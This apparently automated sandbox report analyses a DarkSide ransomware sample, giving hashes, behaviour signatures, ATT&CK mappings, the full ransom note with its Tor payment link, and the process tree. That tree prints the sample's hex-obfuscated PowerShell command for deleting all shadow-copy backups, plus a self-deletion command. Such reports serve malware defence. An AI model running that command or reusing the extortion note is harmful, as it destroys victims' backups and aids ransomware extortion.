Resubmissions

27-01-2024 19:37

240127-yb5pksafd3 10

27-01-2024 19:36

240127-ybqwesafc2 10

12-05-2021 15:56

210512-db4t7vmwas 10

Analysis

  • max time kernel
    119s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    27-01-2024 19:37

General

  • Target

    151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe

  • Size

    59KB

  • MD5

    9d418ecc0f3bf45029263b0944236884

  • SHA1

    eeb28144f39b275ee1ec008859e80f215710dc57

  • SHA256

    151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5

  • SHA512

    82ced42a32f18ede4358459e08bed1adff85d49c952aca7a086571c5b71fd8b3185ea4306abd1f4e639a12f11161f43c73bf6049d76902d365c5a5e4c7e71f3d

  • SSDEEP

    768:vjjmbIax7F3DS4/S9+CuUSbVAdNcxGV1ylvD7Y23W58:0x7Fu4/ihrhDTV1ylbcZ58

Malware Config

Extracted

Path

C:\Users\Admin\README.21af4d10.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT When you open our website, put the following data in the input form: Key: 0kZdK3HQhsAkUtvRl41QkOdpJvzcWnCrBjjgg5U4zfuWeTnZR5Ssjd3QLHpmbjxjo7uWzKbt8qPVuYN38TsDPI3bemd5I40ksemIzuI5OhIHZsi9cn3Wpd7OUT72FP9MyAUzR586yMsI2Ygri9in0Bf4EkG0pmBOLyRG1T788foGJQW1WxS1Qd2sMVvX0jKlbGG1zLp7g0u6buDCzSMyTjWjuVzJYufBBv7S2XvciEVvboiTNbZA4UUU6PttKERQSb018aILd6xO3ulk6fbEgZDO5tZSGn2zRevn5YXnHtg6vt1ToLe3izQOgYbs8Ja1fkfJBUYVux1ITyWBjpn0xPayKfwln8SqgMkbqiDyxEDEtFhqiffLcONMhi4TmW50loZIC6mWSaOjThWp6XSJUWPtY8Mkzs8Cs0qjPahx58iAEVIRGUVpLkMs7xPN7ydZ6wMWaOcRC1AD1JEUVTjLikXXyckgYaS6FnEv0UNEsv6QbTLSpDomIg3rEYZBib6ozrwH5n0M5wrKo8NciUBmfJWDP4XKkjznpsa05rEpuAklM0dMmZsYGVR !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Renames multiple (155) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe
    "C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2536
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2620
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\151FBD~1.EXE >> NUL
      2⤵
      • Deletes itself
      PID:1644
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3036

Network

MITRE ATT&CK Matrix ATT&CK v13

Defense Evasion

Modify Registry

1
T1112

Credential Access

Unsecured Credentials

1
T1552

Credentials In Files

1
T1552.001

Discovery

System Information Discovery

1
T1082

Collection

Data from Local System

1
T1005

Impact

Defacement

1
T1491

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize

    64KB

    MD5

    d71dff97ca86ca16c3db8bdb5285fb35

    SHA1

    271c01246897497d069b81ed37af296cf6c1e498

    SHA256

    4a19255504acfbd49c4e1aed722c7e62b50b5742b860eedabc5f46160f8aefac

    SHA512

    1fed2a183296b563e35d803927e539d28169895f6ca5b522a1c714f222a2d3e578b1e167b19568b5ad4800b898f7ac041c7bd8f6bb02d1361b32cbdcfb0f682a

  • C:\Users\Admin\AppData\Local\Temp\Tar602F.tmp
    Filesize

    100KB

    MD5

    a00422c3302654f44e37af023fbd071d

    SHA1

    36c174d467f5a24056537fe22e01bed9d83ddb64

    SHA256

    ba8f89742d26fdd5102573ffcf2a2bf0f3356c65e8d4dc4db310bda2a120d99a

    SHA512

    913963ab74148f5b7272ae29c1d6f0d4224f5907a62102e72dd528dcacaf11fbcb70714385833edeeb6371f68d4a32798943bf33877493234da312c4a4c0cead

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    33a70378655e5dbec2e01c5abf4ae603

    SHA1

    dedc9479d24785eebaef0acb9acf78e93e567ed6

    SHA256

    d3357c5e342bbf7adcc35ca7e88768e6e231fb7f866dc190e2a21334082ad42f

    SHA512

    dfd3180eee97dbb40925a8205dffdb75e3d22bd33af8e78dfb1a08ec8882db8b297a985383b207810450fcaa74f0cf2c6210f77d4695e236c8d6d6e30ce5ebce

  • C:\Users\Admin\README.21af4d10.TXT
    Filesize

    1KB

    MD5

    65494ea6831e577d82fac2b91b9c3d43

    SHA1

    5c23717d22ee9b94306f2d5a2a53c60aca03eb8c

    SHA256

    5e98b41a51606e16dda30ad4a49457227f75d71ad2004e2942c6b8de6202c4f3

    SHA512

    28ba13f7793ac8271af03b26eaeba6cbe707bf1f07fb1792818a6ab270d1c20d0091ef4a10c092f60c373aefe09698d2b470ec6a7f8cfa47103fd8bbb8d7a7bb

  • memory/2620-23-0x0000000002D10000-0x0000000002D90000-memory.dmp
    Filesize

    512KB

  • memory/2620-22-0x0000000002D10000-0x0000000002D90000-memory.dmp
    Filesize

    512KB

  • memory/2620-21-0x000007FEF4EB0000-0x000007FEF584D000-memory.dmp
    Filesize

    9.6MB

  • memory/2620-17-0x000000001B770000-0x000000001BA52000-memory.dmp
    Filesize

    2.9MB

  • memory/2620-25-0x000007FEF4EB0000-0x000007FEF584D000-memory.dmp
    Filesize

    9.6MB

  • memory/2620-24-0x0000000002D10000-0x0000000002D90000-memory.dmp
    Filesize

    512KB

  • memory/2620-18-0x0000000001D90000-0x0000000001D98000-memory.dmp
    Filesize

    32KB

  • memory/2620-20-0x0000000002D10000-0x0000000002D90000-memory.dmp
    Filesize

    512KB

  • memory/2620-19-0x000007FEF4EB0000-0x000007FEF584D000-memory.dmp
    Filesize

    9.6MB